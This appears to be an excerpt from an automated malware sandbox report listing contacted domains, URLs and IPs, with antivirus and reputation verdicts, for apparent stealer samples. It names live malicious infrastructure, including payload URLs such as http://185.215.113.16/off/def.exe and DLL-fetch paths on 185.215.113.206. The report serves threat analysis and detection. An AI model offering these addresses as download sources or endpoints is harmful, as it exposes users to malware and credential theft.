bzib.nelreports.net	unknown	unknown	false		unknown
thumbystriw.store	unknown	unknown	true	100%, URL Reputation	unknown
shavar.services.mozilla.com	unknown	unknown	false		high
crisiwarny.store	unknown	unknown	true	100%, URL Reputation	unknown
api.msn.com	unknown	unknown	false		unknown
www.wikipedia.org	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/	false		high
uppermixturyz.site	true	Avira URL Cloud: safe	unknown
unityshootsz.site	true	Avira URL Cloud: safe	unknown
http://185.215.113.206/746f34465cf17784/freebl3.dll	false		high
http://185.215.113.206/746f34465cf17784/mozglue.dll	false		high
monopuncdz.site	true	Avira URL Cloud: safe	unknown
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1730737993150&w=0&anoncknm=app_anon&NoResponseBody=true	false	Avira URL Cloud: safe	unknown
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1730737993153&w=0&anoncknm=app_anon&NoResponseBody=true	false	Avira URL Cloud: safe	unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://founpiuer.store/apih	3e169c0a7e.exe, 00000009.00000003.2957681876.0000000000D90000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-	firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	false		high
http://detectportal.firefox.com/	firefox.exe, 0000001D.00000002.3434987290.000001B6372FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206(	7fb3e2a1d2.exe, 0000000E.00000002.3556235147.000000000160E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%	firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records	firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://merino.services.mozilla.com/api/v1/suggest	firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	false		high
https://json-schema.org/draft/2019-09/schema.	firefox.exe, 0000001D.00000002.3489841190.000001B63DF6F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://spocs.getpocket.com/spocs	firefox.exe, 0000001D.00000002.3483013862.000001B63DC80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3480721237.000001B63DBDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3370593805.000001B63643D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill	firefox.exe, 0000001D.00000002.3251964411.000001B631F25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3248030030.000001B6316B3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/6Y	7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001681000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://screenshots.firefox.com	firefox.exe, 0000001D.00000002.3250256598.000001B631EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://detectportal.firefox.com/canonical.html.unified-extensions-context-menu-pin-to-toolbarACTIVIT	firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ads.stickyadstv.com/firefox-etp	firefox.exe, 0000001D.00000002.3391045339.000001B63660E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636605000.00000004.00000800.00020000.00000000.sdmp	false		high
https://founpiuer.store/iV	3e169c0a7e.exe, 00000009.00000003.3008677570.000000000540D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://profiler.firefox.comException	firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM	firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://www.amazon.com/exec/obidos/external-search/	firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3368455857.000001B6363C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068223683.000001B635761000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068004981.000001B63573F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	false		high
https://profiler.firefox.com/	firefox.exe, 0000001D.00000002.3290075534.000001B6336A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/0	firefox.exe, 0000001D.00000002.3496249008.000006C56F700000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mozilla-services/screenshots	firefox.exe, 0000001D.00000003.3067176778.000001B635500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3067599382.000001B63571E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3348398161.000001B636000000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068223683.000001B635761000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068004981.000001B63573F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest	firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def	firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tracking-protection-issues.herokuapp.com/new	firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report	firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	false		high
http://exslt.org/common	firefox.exe, 0000001D.00000002.3245912168.000001B63158A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ok.ru/	firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe	firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/	firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	false		high
http://exslt.org/dates-and-times	firefox.exe, 0000001D.00000002.3245912168.000001B631561000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exe(gM	3e169c0a7e.exe, 0000000F.00000003.3373737801.00000000013E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://win.mail.ru/cgi-bin/sentmsg?mailto=%s	firefox.exe, 0000001D.00000003.3097197709.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3330207750.000001B635DDA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3097956840.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	3e169c0a7e.exe, 00000009.00000003.2900557208.00000000053A9000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900874990.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900671533.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926351246.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2925930815.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926030012.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041989367.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041685223.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041600113.0000000005B19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://MD8.mozilla.org/1/m	firefox.exe, 0000001D.00000002.3489841190.000001B63DFBA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.bbc.co.uk/	firefox.exe, 0000001D.00000002.3499653000.000019553EF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3418311411.000001B636A64000.00000004.00000800.00020000.00000000.sdmp	false		high
https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=	firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3293412556.000001B634FDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3483013862.000001B63DC56000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bugzilla.mo	firefox.exe, 0000001D.00000002.3449360163.000001B637847000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3303944369.000001B635442000.00000004.00000800.00020000.00000000.sdmp	false		high
https://addons.mozilla.orgupgradeTabsProgressListenertestPermissionFromPrincipalshowBadgeOnlyNotific	firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mitmdetection.services.mozilla.com/	firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://static.adsafeprotected.com/firefox-etp-js	firefox.exe, 0000001D.00000002.3391045339.000001B63660E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	3e169c0a7e.exe, 00000009.00000003.2948054390.000000000540B000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2949019284.000000000540B000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2961848227.0000000003498000.00000004.00000020.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001681000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3084602263.0000000005AFF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3245912168.000001B6315AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	3e169c0a7e.exe, 00000009.00000003.2948054390.000000000540B000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2949019284.000000000540B000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2961848227.0000000003498000.00000004.00000020.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001681000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3084602263.0000000005AFF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3245912168.000001B6315AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exe	3e169c0a7e.exe, 3e169c0a7e.exe, 00000009.00000003.3164057565.0000000000D7F000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3373737801.00000000013E5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://spocs.getpocket.com/	firefox.exe, 0000001D.00000002.3483013862.000001B63DC80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	false		high
https://terracedjz.c	pisos23.exe, 0000000A.00000002.3121196586.0000000003429000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.3098052157.0000000003427000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.3094450003.0000000003425000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://services.addons.mozilla.org/api/v4/abuse/report/addon/	firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%	firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exeowFg	3e169c0a7e.exe, 0000000F.00000003.3373737801.00000000013E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f	firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://ebay.comP	firefox.exe, 0000001D.00000002.3497366247.000014FC8A604000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.iqiyi.com/	firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3499653000.000019553EF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3418311411.000001B636A64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mozilla-services/screenshotshttps://screenshots.firefox.com/	firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/746f34465cf17784/softokn3.dllEF	7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001666000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://monitor.firefox.com/user/breach-stats?includeResolved=true	firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report	firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://bugzilla.mozilla.org/show_bug.cgi?id=1584464	firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/6c4adf523b719729.phpBrowser	7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001681000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	3e169c0a7e.exe, 0000000F.00000003.3084602263.0000000005AFF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3245912168.000001B6315AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	false		high
https://yandex.com	firefox.exe, 0000001D.00000002.3497366247.000014FC8A604000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.rs/getrandom#nodejs-es-module-support	7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000B3C000.00000040.00000001.01000000.0000000C.sdmp, 7fb3e2a1d2.exe, 0000000E.00000003.2960979403.00000000051CB000.00000004.00001000.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3420827049.000000000880B000.00000004.00001000.00020000.00000000.sdmp	false		high
https://monitor.firefox.com/about	firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://account.bellmedia.c	firefox.exe, 0000001D.00000002.3472196282.000001B639533000.00000004.00000800.00020000.00000000.sdmp	false		high
http://youtube.com/	firefox.exe, 0000001D.00000002.3315352593.000001B6355D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com	firefox.exe, 0000001D.00000002.3472196282.000001B639533000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto	firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0	3e169c0a7e.exe, 00000009.00000003.2948054390.000000000540B000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2949019284.000000000540B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.zhihu.com/	firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3483013862.000001B63DC44000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	3e169c0a7e.exe, 00000009.00000003.2932672578.000000000547D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2960129987.0000000005B63000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3073834405.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B6374D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3414137723.000001B636894000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3480721237.000001B63DB7A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	3e169c0a7e.exe, 00000009.00000003.2932672578.000000000547D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2960129987.0000000005B63000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3073834405.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B6374D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3414137723.000001B636894000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3480721237.000001B63DB7A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://infra.spec.whatwg.org/#ascii-whitespace	firefox.exe, 0000001D.00000002.3479649121.000001B63DA5D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mozilla-hub.atlassian.net/browse/SDK-405	firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	3e169c0a7e.exe, 0000000F.00000003.3076713428.0000000005E0B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://firefox.settings.services.mozilla.com/v1It	firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mail.yahoo.co.jp/compose/?To=%s	firefox.exe, 0000001D.00000003.3097197709.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3330207750.000001B635DDA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3327340390.000001B635A7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3097956840.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile.services.mozilla.com/v1/tiles	firefox.exe, 0000001D.00000002.3483013862.000001B63DC80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3483013862.000001B63DCDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000003.3141800421.000001B63DCDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3480721237.000001B63DBDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3489841190.000001B63DF34000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.co.uk/	firefox.exe, 0000001D.00000002.3418311411.000001B636A64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://monitor.firefox.com/user/preferences	firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://screenshots.firefox.com/	firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068223683.000001B635761000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3315352593.000001B635576000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068004981.000001B63573F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/746f34465cf17784/msvcp140.dll2F	7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001666000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gpuweb.github.io/gpuweb/	firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp	false		high
https://firefox-source-docs.mozilla.org/remote/Security.html	firefox.exe, 0000001D.00000002.3251964411.000001B631F25000.00000004.00000800.00020000.00000000.sdmp	false		high
http://json-schema.org/draft-07/schema#-	firefox.exe, 0000001D.00000002.3489841190.000001B63DF6F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report	firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://www.wykop.pl/	firefox.exe, 0000001D.00000002.3499653000.000019553EF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3418311411.000001B636A64000.00000004.00000800.00020000.00000000.sdmp	false		high
https://vk.com/	firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying	firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://www.olx.pl/	firefox.exe, 0000001D.00000002.3499653000.000019553EF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3418311411.000001B636A64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3483013862.000001B63DC44000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/Z	firefox.exe, 0000001D.00000002.3496249008.000006C56F700000.00000004.00000800.00020000.00000000.sdmp	false		high
https://xhr.spec.whatwg.org/#sync-warningThe	firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4	firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2	firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
18.245.60.72	sb.scorecardresearch.com	United States	16509	AMAZON-02US	false
20.189.173.8	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.47.51.170	unknown	United States	16625	AKAMAI-ASUS	false
23.198.7.165	unknown	United States	20940	AKAMAI-ASN1EU	false
20.125.209.212	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
162.159.61.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
23.218.232.185	unknown	United States	24835	RAYA-ASEG	false
23.38.189.114	unknown	United States	16625	AKAMAI-ASUS	false
3.168.2.84	unknown	United States	16509	AMAZON-02US	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
188.114.97.3	terracedjz.cyou	European Union	13335	CLOUDFLARENETUS	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
20.96.153.111	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
34.160.144.191	prod.content-signature-chains.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false
142.250.115.132	unknown	United States	15169	GOOGLEUS	false
142.250.185.78	youtube.com	United States	15169	GOOGLEUS	false
4.152.199.46	unknown	United States	3356	LEVEL3US	false
34.117.188.166	contile.services.mozilla.com	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
142.250.186.132	www.google.com	United States	15169	GOOGLEUS	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.64.41.3	unknown	United States	13335	CLOUDFLARENETUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false
23.198.7.175	unknown	United States	20940	AKAMAI-ASN1EU	false
13.107.246.57	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.21.5.155	founpiuer.store	United States	13335	CLOUDFLARENETUS	false
94.245.104.56	ssl.bingadsedgeextension-prod-europe.azurewebsites.net	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
